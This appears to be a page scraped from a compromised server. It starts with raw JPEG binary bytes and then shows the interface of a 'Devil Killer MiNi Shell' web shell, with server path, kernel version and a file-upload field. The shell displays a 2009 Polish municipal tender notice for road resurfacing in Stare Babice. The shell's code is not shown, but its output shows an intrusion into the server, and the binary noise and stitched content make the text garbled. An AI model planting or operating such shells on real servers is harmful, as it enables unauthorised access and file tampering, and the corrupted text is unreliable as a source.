JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090519/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090519/155936-N-2009.html

<p class="kh_header"><b>Stare Babice: Przedmiotem zamówienia jest wykonanie wzmocnienia istniejących nawierzchni dróg gminnych destruktem bitumicznym wraz z powierzchniowym utrwaleniem.</b><br>
<b>Numer ogłoszenia: 155936 - 2009; data zamieszczenia: 19.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Stare Babice , Rynek 32, 05-082 Stare Babice, woj. mazowieckie, tel. 0-22 722 95 36, faks 0-22 722 95 36.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest wykonanie wzmocnienia istniejących nawierzchni dróg gminnych destruktem bitumicznym wraz z powierzchniowym utrwaleniem..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> UWAGA: Prosi się Wykonawców o dokładne zapoznanie się z treścią siwz, a w szczególności z opisem przedmiotu zamówienia i warunkami udziału w postępowaniu, gdyż udział Wykonawcy nie spełniającego postanowień siwz oraz złożenie przez niego oferty i w późniejszym etapie nie uzupełnienie przez niego nie złożonych bądź złożonych wadliwych oświadczeń i dokumentów skutkować będzie zatrzymaniem przez Zamawiającą wadium zgodnie z art. 46 ust. 4a ustawy prawo zamówień publicznych.  

4.1. Wykonanie wzmocnienia nawierzchni gruntowej destruktem bitumicznym wraz z powierzchniowym  utrwaleniem oraz powierzchniowe utrwalenie:

1)	Wykonanie wzmocnienia nawierzchni gruntowej destruktem bitumicznym wraz z powierzchniowym  utrwaleniem na niżej wymienionych drogach:
a)	ul. Szeligowska we wsi Latchorzew - wzmocnienie nawierzchni gruntowej destruktem bitumicznym wraz z jednokrotnym powierzchniowym utrwaleniem na długości około 200 m i szerokości około 4 m (około 800 m2);
b)	ul. Kmicica we wsi Stare Babice - wzmocnienie nawierzchni gruntowej destruktem bitumicznym wraz z jednokrotnym powierzchniowym utrwaleniem na długości około 100 m i szerokości około 4 m (około 400 m2);
c)	ul. Agawy we wsi Kwirynów na odcinku od ul. Jaśminowej do ul. Pohulanka - wzmocnienie nawierzchni gruntowej destruktem bitumicznym wraz z podwójnym powierzchniowym utrwaleniem na długości około 600 m i szerokości około 5 m (około 3000 m2);
d)	ul. Białej Brzozy we wsi Kwirynów - wzmocnienie nawierzchni gruntowej destruktem bitumicznym wraz z jednokrotnym powierzchniowym utrwaleniem na długości około 450 m i szerokości około 5 m (około 2250 m2);
e)	ul. Świerkowa we wsi Kwirynów - wzmocnienie nawierzchni gruntowej destruktem bitumicznym wraz z dwukrotnym powierzchniowym utrwaleniem na długości około 420 m i szerokości około 5 m (około 1680 m2);
f)	ul. Wierzbowa we wsi Kwirynów - wzmocnienie nawierzchni gruntowej destruktem bitumicznym wraz z dwukrotnym powierzchniowym utrwaleniem na długości około 460 m i szerokości około 5 m (około 2300 m2); 
g)	ul. Kalinowa we wsi Kwirynów na odcinku od ul. Pohulanka do ul. Jaśminowej - wzmocnienie nawierzchni gruntowej destruktem bitumicznym wraz z podwójnym powierzchniowym utrwaleniem na długości około 540 m i szerokości około 5 m (około 2700 m2);
h)	ul. Bukowa we wsi Kwirynów - wzmocnienie nawierzchni gruntowej destruktem bitumicznym wraz z jednokrotnym powierzchniowym utrwaleniem na długości około 100 m i szerokości około 4 m (około 400 m2);
i)	ul. Łosiowe Błota we wsi Kwirynów na odcinku od istniejącej nawierzchni z destruktu - wzmocnienie nawierzchni gruntowej destruktem bitumicznym wraz z podwójnym powierzchniowym utrwaleniem na długości około 450 m i szerokości około 5 m (około 2500 m2);
j)	ul. Świerczewskiego we wsi Blizne Jasińskiego - wzmocnienie nawierzchni gruntowej destruktem bitumicznym wraz z dwukrotnym powierzchniowym utrwaleniem na długości około 300 m i szerokości około 5 m (około 1500 m2);
k)	ul. Reja we wsi Blizne Jasińskiego na odcinku od ul. Hubala - Dobrzańskiego do ul. Kościuszki - wzmocnienie nawierzchni gruntowej destruktem bitumicznym wraz z podwójnym powierzchniowym utrwaleniem na długości około 375 m i szerokości około 5 m (około 1870 m2);
l)	ul. Prusa we wsi Blizne Jasińskiego na odcinku od ul. Hubala-Dobrzańskiego do ul. Świerczewskiego - wzmocnienie nawierzchni gruntowej destruktem bitumicznym wraz z podwójnym powierzchniowym utrwaleniem na długości około 80 m i szerokości około 5 m (około 400 m2);
m)	ul. Kościuszki we wsi Blizne Jasińskiego na odcinku od ul. Prusa do ul. Kraszewskiego - wzmocnienie nawierzchni gruntowej destruktem bitumicznym wraz z jednokrotnym powierzchniowym utrwaleniem na długości około 225 m i szerokości około 5 m (około 1125 m2);
n)	ul. Maczka we wsi Janów na odcinku od ul. Sikorskiego - wzmocnienie nawierzchni gruntowej destruktem bitumicznym wraz z dwukrotnym powierzchniowym utrwaleniem na długości około 500 m i szerokości około 5 m (około 2500 m2);
o)	ul. Karabeli we wsi Lipków na odcinku od ul. Sportowej do istniejącej nawierzchni z destruktu bitumicznego - wzmocnienie nawierzchni gruntowej destruktem bitumicznym wraz z jednokrotnym powierzchniowym utrwaleniem na długości około 200 m i szerokości około 5 m (około 1000 m2);
p)	inne drogi gminne o nawierzchni żwirowo - gruntowej, zgłoszone w trakcie realizacji zadania, na których wystąpi konieczność wzmocnienia nawierzchni destruktem bitumicznym z zastrzeżeniem, że wartość umowy nie przekroczy kwoty przeznaczonej na sfinansowanie zamówienia.

2)	Powierzchniowe utrwalenie nawierzchni z destruktu bitumicznego na niżej wymienionych drogach:
a)	ul. Pogodna, Zaciszna, Gwiaździsta we wsi Stare Babice - jednokrotne powierzchniowe utrwalenie nawierzchni z destruktu bitumicznego na długości około 600 m i szerokości około 4 m (około 2400 m2);
b)	ul. Tulipanowa (na odcinku od ul. Modrzewiowej do ul. Konwaliowej) - jednokrotne powierzchniowe utrwalenie nawierzchni z destruktu bitumicznego na długości około 600 m i szerokości około 5 m (około 3000 m2);
c)	ul. Górki we wsi Koczargi Stare (po drugiej stronie ul. Klonowej) - jednokrotne powierzchniowe utrwalenie nawierzchni z destruktu bitumicznego na długości około 750 m i szerokości około 4 m (około 3000 m2);
d)	inne drogi gminne o nawierzchni z destruktu bądź asfaltu, zgłoszone w trakcie realizacji zadania, na których wystąpi konieczność powierzchniowego utrwalenia z zastrzeżeniem, że wartość umowy nie przekroczy kwoty przeznaczonej na sfinansowanie zamówienia.

3)Wyszczególnienie robót będących przedmiotem zamówienia:
 Wzmocnienie nawierzchni gruntowej destruktem bitumicznym wraz z podwójnym  
 powierzchniowym utrwaleniem:
-	korytowanie istniejącego podłoża żwirowo - gruntowego na głębokość co najmniej 10 cm z wywozem nadmiaru na odkład stały (znalezienie składowiska po stronie Wykonawcy robót);
-	profilowanie i zagęszczanie przygotowanego podłoża walcem stalowym wibracyjnym;
-	zakup oraz dostarczenie destruktu bitumicznego na teren budowy wraz z rozłożeniem warstwą 10 cm i wykonaniem spadku daszkowego po około 2 % od osi jezdni w stronę pobocza;
-	regulacja istniejących w pasie drogowym urządzeń infrastruktury technicznej do poziomu nawierzchni jezdni;
-	ręczne wyrównanie krawędzi jezdni;
-	zagęszczenie destruktu walcem stalowym wibracyjnym;
-	mechaniczne oczyszczenie podłoża z frakcji piaskowych i pyłowych oraz luźnego destruktu z wywozem na odkład stały (znalezienie składowiska po stronie Wykonawcy robót);
-	zagęszczenie podłoża walcem stalowym wibracyjnym;
-	mechaniczne skropienie podłoża emulsją asfaltową kationową 70% modyfikowaną, szybkorozpadową;
-	mechaniczne rozłożenie grysu bazaltowego, płukanego o uziarnieniu 5/8 mm; w przypadku dwukrotnego powierzchniowego utrwalenia druga warstwa grysu o uziarnieniu 2/5 mm;
-	zawałowanie nawierzchni walcem gumowym;
-	pielęgnacja nawierzchni w przypadku tzw. pocenia poprzez zasypanie pocących się miejsc grysem bazaltowym;
-	plantowanie poboczy wykonywane mechanicznie przy grubości ścinania około 10 
    cm (miejsca wskazywane będą każdorazowo przez pracownika urzędu gminy);
-  Zamawiający przewiduje wykonanie na poboczu rowków odwadniających (wypełnionych kruszywem dolomitowym o frakcji 4-31,5mm), o głębokości i szerokości co najmniej 20÷30 cm w zależności od szerokości pobocza i długości około 5000 mb (miejsca i ulice przy których będzie konieczność wykonania rowków odwadniających będą wskazywane każdorazowo przez pracownika urzędu gminy), transport i zakup kruszywa na teren dróg gminnych zapewni Wykonawca; wykonawca jest zobowiązany do wywozu urobku z rowków odwadniających na własne składowisko; 
-	uporządkowanie terenu
Powierzchniowe utrwalenie nawierzchni z destruktu bitumicznego:
-	mechaniczne oczyszczenie podłoża z frakcji piaskowych i pyłowych oraz luźnego destruktu i grysu bazaltowego z wywozem na odkład stały (znalezienie składowiska po stronie Wykonawcy robót);
-	uzupełnienie ubytków w nawierzchni oraz wyrównanie jej destruktem celem nadania właściwego spadku (2% od osi jezdni w stronę pobocza) o grubości nowej warstwy destruktu do 5 cm (tylko i wyłącznie po wcześniejszym uzgodnieniu z Zamawiającą);
-	zagęszczenie podłoża walcem stalowym wibracyjnym;
-	mechaniczne skropienie podłoża emulsją asfaltową kationową 70% modyfikowaną, szybkorozpadową;
-	mechaniczne rozłożenie grysu bazaltowego, płukanego o uziarnieniu 5/8 mm; w przypadku dwukrotnego powierzchniowego utrwalenia druga warstwa grysu o uziarnieniu 2-5 mm;
-	zawałowanie nawierzchni walcem gumowym;
-	pielęgnacja nawierzchni w przypadku tzw. pocenia poprzez zasypanie pocących się miejsc grysem bazaltowym;
-	plantowanie poboczy wykonywane mechanicznie przy grubości ścinania około 10 cm (miejsca wskazywane będą każdorazowo przez pracownika urzędu gminy);
-	uporządkowanie terenu.

Po wykorytowaniu istniejącego podłoża żwirowo gruntowego należy bezwzględnie zawiadomić pracownika Zamawiającej celem skontrolowania głębokości wykonania koryta i wyrażenia zgody na układanie warstwy destruktu. W przypadku braku możliwości kontaktu z pracownikiem Zamawiającego, lub prowadzeniu robót w dniu, w którym Urząd nie jest czynny wówczas należy wykonać dokumentacje fotograficzną wyraźnie wskazującą żądaną głębokość korytowania oraz miejsce prowadzenia robót.
  
Ewentualne uzupełnienie ubytków w nawierzchni oraz wyrównanie jej destruktem celem nadania właściwego spadku o grubości nowej warstwy destruktu do 5 cm należy wykonywać tylko i wyłącznie w uzgodnieniu z Zamawiającą, prowadzenie powyższych robót bez zgody Inwestora grozi nie odebraniem robót.

W przypadku jednokrotnego powierzchniowego utrwalenia należy używać grysu bazaltowego, płukanego o uziarnieniu 5/8 mm, natomiast w przypadku dwukrotnego przy następnej warstwie należy użyć grysu bazaltowego, płukanego o uziarnieniu 2/5 mm.

Zabrania się pod groźbą nie odebrania robót, prowadzenia jakichkolwiek prac stanowiących przedmiot umowy w okresach wieczornych i nocnych oraz w dni świąteczne, w szczególności dotyczy to: zwożenia i składowania destruktu oraz jego układania, używania maszyn budowlanych oraz innych prac powodujących  uciążliwości dla mieszkańców.

Dostarczane kruszywo drogowe - kliniec dolomitowy o frakcji 4 - 31,5 mm powinno odpowiadać PN-EN 13043:2004 Kruszywa do mieszanek bitumicznych i powierzchniowych utrwaleń stosowanych na drogach, lotniskach i innych powierzchniach przeznaczonych do ruchu. Dostawca do każdej dostarczonej partii kruszywa powinien dołączyć deklarację zgodności wyrobu z w/w dokumentem.

Wykonawca we własnym zakresie zorganizuje sobie składowisko destruktu na terenie prowadzonych prac, a w przypadku zorganizowania takiego składowiska przez Zamawiającą zobowiązuje się do opłacenia kosztów z tym związanych (w przypadku zaistnienia takiej konieczności) oraz jego późniejszego uprzątnięcia i pozostawienia w stanie z przed składowania materiału. Nie dopuszcza się dostarczania materiałów  w okresach wieczornych i nocnych oraz w dni świąteczne.

Wykonawca na własny koszt doprowadzi wodę i energię elektryczną na teren budowy stosownie do potrzeb budowy w przypadku takiej konieczności.

Wykonawca wykona na własny koszt liczniki zużycia wody i energii oraz będzie ponosił koszty zużycia wody i energii w okresie realizacji robót.

Wykonawca będzie ponosił koszty utrzymania oraz konserwacji urządzeń i obiektów tymczasowych na placu budowy.

Wykonawca zobowiązuje się wykonać i utrzymać na swój koszt ogrodzenie terenu i zaplecza budowy, strzec mienia znajdującego się na terenie budowy a także zapewnić warunki bezpieczeństwa i higieny pracy.

Wykonawca we własnym zakresie wywiezie wszelką ziemię, żwir, kruszywo, luźny destrukt lub inne elementy pozostałe w wyniku prowadzenia robót na składowisko lub wysypisko oraz poniesie koszty tych czynności.

Roboty można rozpocząć dopiero po wykonaniu oznakowania i zabezpieczenia robót zgodnie z przepisami prawa. W tym celu należy wykonać projekty organizacji ruchu na czas robót oraz zaopiniować je we właściwym Referacie Urzędu Gminy oraz zatwierdzić w Zarządzie Dróg Powiatowych w Ożarowie Mazowieckim. W w/w projektach należy przede wszystkim uwzględnić następujące oznakowanie: A-14, A-28, A-30, B-33 o wartości 20, w przypadku zwężeń jezdni znaki A-12a, A-12b, A-12c oraz inne niezbędne przy prowadzeniu robót oznakowanie. W/w oznakowanie musi być ustawione zarówno z jednej strony jak i z drugiej strony ulicy na której wykonywane są roboty. Obowiązuje dokonanie komisyjnego odbioru oznakowania i zabezpieczenia robót przy udziale inspektora nadzoru i pracownika Urzędu Gminy w Starych Babicach. Wykonawca ponosi pełną odpowiedzialność za utrzymanie oznakowania i zabezpieczenia robót w trakcie ich wykonywanych. 

W przypadku zwiększenia zakresu przedmiotu zamówienia i zbliżaniu się terminu końcowego wykonania robót, może on być przedłużony o czas niezbędny na zatwierdzenie projektu organizacji ruchu oraz wykonanie robót na nowej ulicy, o którą zwiększono zakres zamówienia.

W trakcie wykonywania robót należy umożliwić mieszkańcom dojazd do posesji, każde naruszenie zjazdu uzgadniać indywidualnie z Właścicielem posesji. W przypadku zgłoszenia przez Właściciela posesji zniszczonego wjazdu do posesji roboty nie zostaną odebrane do momentu jego naprawy lub stwierdzeniu bezzasadności roszczenia przez komisję w składzie co najmniej złożonej z upoważnionego przedstawiciela Wykonawcy, Inspektora Nadzoru, oraz pracownika Zamawiającej.
W przypadku uszkodzenia przez Wykonawcę jakiegokolwiek urządzenia infrastruktury technicznej nadziemnej lub podziemnej zobowiązany jest on bezzwłocznie powiadomić Właściciela tego urządzenia o jego uszkodzeniu, zabezpieczenia miejsca awarii oraz udzieleniu pomocy przy usuwaniu awarii bądź na żądanie Właściciela usunięcia awarii. O incydencie należy również powiadomić pracownika Zamawiającej.

W przypadku pozostawienia odcinka robót w stanie zagrażającym mieszkańcom bądź użytkownikom ruchu na noc lub wolne od pracy dni Wykonawca obowiązany jest zabezpieczyć takie miejsce wyraźnym oznakowaniem lub je wygrodzić, a w przypadku zaistnienia takiej konieczności zastosować również oświetlenie ostrzegawcze. 

Wykonawca ponosi ryzyko wynikające z prowadzenia robót bez zamykania ruchu. 

Wszelkie roszczenia użytkowników dróg i mieszkańców jakie wpłyną do Zarządzającego drogami, związane z wadliwym wykonaniem bądź technologią robót będących przedmiotem niniejszej SIWZ i umowy będą kierowane do Wykonawcy w celu ich załatwienia. W szczególności tyczy się to przyklejania emulsji asfaltowej i grysu do podwozi i nadwozi samochodów, ubrań itp. oraz wnoszenia tych zabrudzeń na teren posesji i niszczenia podwórka lub elementów budynków na działkach prywatnych. W przypadku wpłynięcia do Gminy takiego roszczenia i uznania go za zasadne oraz przekazaniu go Wykonawcy robót, wówczas deklaruje się on w terminie 7 dni od otrzymania takiego pisma podjąć działania w celu załatwienia sprawy ze zgłaszającym uszkodzenie. W momencie kiedy Wykonawca nie podejmie działań w celu załatwienia w/w sprawy wówczas Gmina pokryje koszty zgłoszonego roszczenia i wystąpi na drogę sądową o wyegzekwowanie od Wykonawcy poniesionych kosztów.  
 
Wszelkie naprawy gwarancyjne będą realizowane w ciągu 7 dni roboczych od dnia zgłoszenia przez Zamawiającego.

Wykonawca dokona regulacji istniejących w pasie drogowym urządzeń infrastruktury technicznej do poziomu nawierzchni jezdni w uzgodnieniu z ich właścicielami bądź użytkownikami po wcześniejszym ustaleniu ich przebiegu. W zakresie sieci wodociągowej i kanalizacyjnej zakończenie regulacji urządzeń infrastruktury należy potwierdzić protokołem odbioru z udziałem upoważnionego pracownika Gminnego Przedsiębiorstwa Komunalnego EKO-BABICE Sp. z o.o. bądź innego właściciela urządzenia.  W przypadku braku takiego protokołu lub zgłoszenia przez Właściciela urządzeń braku ich regulacji wówczas roboty nie zostaną odebrane do czasu  wykonania w/w czynności.

Termin rozpoczęcia ustala się wstępnie na czerwiec 2009 r.

Transport kruszywa na teren dróg gminnych zapewni Wykonawca. 

Nie dopuszcza się składania ofert częściowych i wariantowych.

Przewiduje się w okresie 3 lat od udzielenia zamówienia podstawowego, udzielenie dotychczasowemu Wykonawcy zamówień uzupełniających, stanowiących nie więcej niż 
50 % wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.20-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Oferent obowiązany jest wnieść wadium w wysokości 15 000,00 zł  (słownie: piętnaście tysięcy zł 00/100) przed upływem terminu składania ofert w następującej formie:
1)	W pieniądzu (wpłatę wadium należy dokonać na konto: 65 8015 0004 3000 1124 3030 0009 z dopiskiem Wykonanie wzmocnienia istniejących dróg gminnych gruntowych destruktem bitumicznym wraz z powierzchniowym utrwaleniem a kopię przelewu dołączyć do oferty.
2)	W poręczeniach bankowych, lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym.
3)	W gwarancjach bankowych.
4)	W gwarancjach ubezpieczeniowych.
5)	W poręczeniach udzielanych przez podmioty, o których mowa w art. 6 ust. 3 pkt. 4 lit. b ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 oraz z 2002 r. Nr 25, poz. 253, Nr 66, poz. 596 i Nr 216, poz. 1824).

Wadium wnoszone w formie gwarancji musi być co najmniej gwarancją nieodwołalną 
i płatną na każde pisemne żądanie Zamawiającej.
Wadium wnoszone w innych dopuszczonych formach niż w pieniądzu należy złożyć w oryginale  wraz z pismem przewodnim w siedzibie Urzędu Gminy, pokój nr 18, a potwierdzoną kopię dołączyć do oferty.
Oferty bez dowodów wniesienia wadium będą traktowane jako nie spełniające wymagań przetargu i na tej podstawie zostaną odrzucone bez dalszego rozpatrywania.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Do składania ofert zostaną zakwalifikowani oferenci:
1)	dopuszczeni do udziału w postępowaniu po uwzględnieniu treści punktu 5 niniejszej specyfikacji istotnych warunków zamówienia;
2)	uprawnieni do występowania jako podmioty gospodarcze tj. posiadający odpis z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed terminem składania oferty;
3)	posiadający pozytywne i udokumentowane doświadczenie jako wykonawcy podobnych zadań (co najmniej: zadania polegające na wykonaniu nawierzchni jezdni drogi z destruktu bitumicznego wraz z powierzchniowym utrwaleniem  o łącznej powierzchni co najmniej 40 000 m2 w tym co najmniej jedno zadanie na wykonanie nawierzchni jezdni drogi z destruktu bitumicznego wraz z powierzchniowym utrwaleniem o powierzchni co najmniej 15 000 m2) zrealizowanych w ciągu pięciu ostatnich lat, a jeżeli okres działalności jest krótszy to w tym okresie. Na potwierdzenie doświadczenia należy dołączyć referencje od Inwestorów - zał. 10.  
4)	organizacyjnie, finansowo i technicznie zdolni do sprawnej realizacji przedmiotu zamówienia. Na potwierdzenie należy dołączyć zał. 2 - Wykaz sprzętu jakim dysponuje Wykonawca (co najmniej: koparko ładowarka, równiarka, walec stalowy wibracyjny 10t., walec gumowy wibracyjny, zagęszczarki, samochody ciężarowe samowyładowawcze); zał. 3 - Potencjał kadrowy (co najmniej: jedna osoba z uprawnieniami drogowymi oraz 10 pracowników fizycznych jakimi dysponuje Wykonawca, którzy będą realizować roboty będące przedmiotem zamówienia) oraz pozostałe załączniki wymienione w pkt. 7.

W przypadku gdy Wykonawcy zamierzają wspólnie ubiegać się o zamówienie ustanawiają wtedy pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Jeżeli oferta Wykonawców wspólnie ubiegających się o zamówienie zostanie wybrana Zamawiająca zażąda przed zawarciem umowy w sprawie zamówienia publicznego umowy regulującej współpracę tych Wykonawców..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Na potwierdzenie swojej wiarygodności, doświadczenia i zdolności do realizacji przedmiotu zamówienia, oferenci zobowiązani są załączyć:

zał. 1
	Oferta wykonawcy.			
zał. 2	Wykaz sprzętu (co najmniej: koparko ładowarka, równiarka, walec stalowy wibracyjny 10t., walec gumowy wibracyjny, zagęszczarki, samochody ciężarowe samowyładowawcze).		
zał. 3	Potencjał kadrowy (co najmniej: jedna osoba z uprawnieniami drogowymi oraz 10 pracowników fizycznych jakimi dysponuje Wykonawca, którzy będą realizować roboty będące przedmiotem zamówienia).			
zał. 4	Wykaz zamówień o charakterze i złożoności porównywalnej (co najmniej: zadania polegające na wykonaniu nawierzchni jezdni drogi z destruktu bitumicznego wraz z powierzchniowym utrwaleniem  o łącznej powierzchni co najmniej 40 000 m2 w tym co najmniej jedno zadanie na wykonanie nawierzchni jezdni drogi z destruktu bitumicznego wraz z powierzchniowym utrwaleniem o powierzchni co najmniej 15 000 m2) z zakresem zadania będącego przedmiotem zamówienia zrealizowanych w ciągu pięciu ostatnich lat a jeżeli okres działalności jest krótszy to w tym okresie.			
Wymagane dokumenty.
				
Zał. 5	Wypis z rejestru firmy lub dla firm nie ewidencjonowanych w rejestrach handlowych - wypis z Urzędu Gminy o prowadzeniu działalności gospodarczej.
		
Zał. 6	Zaświadczenie z Urzędu Skarbowego o niezaleganiu w płaceniu należnego  podatku.
			
Zał. 7	Zaświadczenie ZUS o niezaleganiu w płaceniu składek.
			
Zał. 8	Polisa OC Wykonawcy w zakresie prowadzonej działalności zgodnej z przedmiotem zamówienia na wartość co najmniej 500 000 zł.			

Zał. 9	
Opinia z banku o posiadaniu środków lub o zdolności kredytowej w kwocie co najmniej siedmiocyfrowej, 
			
Zał. 10	Listy referencyjne od Inwestorów.
			
Zał. 11	Harmonogram rzeczowo - finansowy (wzór własny).
			
